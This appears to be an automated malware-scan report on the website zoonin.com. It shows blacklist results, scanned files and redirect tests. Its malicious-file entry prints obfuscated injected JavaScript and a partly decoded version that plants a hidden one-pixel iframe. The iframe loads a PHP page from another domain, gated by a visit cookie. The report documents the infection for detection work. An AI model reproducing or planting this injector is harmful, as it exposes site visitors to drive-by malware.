Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zoonin.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zoonin.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zoonin.com/ | 200 OK Content-Length: 9315 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e832e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e833c8180712e4b2e357682827e483d3d8585853c857d7d7281767372737b70807d77727380873c717d7b3d6f727b777c3d56746684455268873c7e767e35491b182e833c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e833c8182877a733c707d807273802e4b2e353e35491b182e833c8182877a73 Decoded script: String String function zzzfff() { var u = document.createElement('iframe'); u.src = 'http://www.woodshedembroidery.com/admin/HfXv7DZy.php'; u.style.position = 'absolute'; u.style.border = '0'; u.style.height = '1px'; u.style.width = '1px'; u.style.left = '1px'; u.style.top = '1px'; if (!document.getElementById('u')) { document.write('<div id=\'u\'></div>'); document.getElementById('u').appendC ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://zoonin.com/../animate.js | 500 Status read failed: Соединение ÑазоÑвано дÑÑгой ÑÑоÑоной Content-Length: 140 Content-Type: text/plain | clean |
http://zoonin.com/test404page.js | 404 Not Found Content-Length: 391 Content-Type: text/html | clean |
http://www.maxelar.com/suzi.js | 404 Not Found Content-Length: 389 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zoonin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 14:31:38 GMT
Accept-Ranges: bytes
ETag: "32130a2-2463-4ff46fe951aab"
Server: Apache
Content-Length: 9315
Content-Type: text/html
Last-Modified: Mon, 28 Jul 2014 20:44:50 GMT
...9315 bytes of data.
GET / HTTP/1.1
Host: zoonin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 14:31:38 GMT
Accept-Ranges: bytes
ETag: "32130a2-2463-4ff46fe951aab"
Server: Apache
Content-Length: 9315
Content-Type: text/html
Last-Modified: Mon, 28 Jul 2014 20:44:50 GMT
...9315 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zoonin.com
Referer: http://www.google.com/search?q=zoonin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zoonin.com
Referer: http://www.google.com/search?q=zoonin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.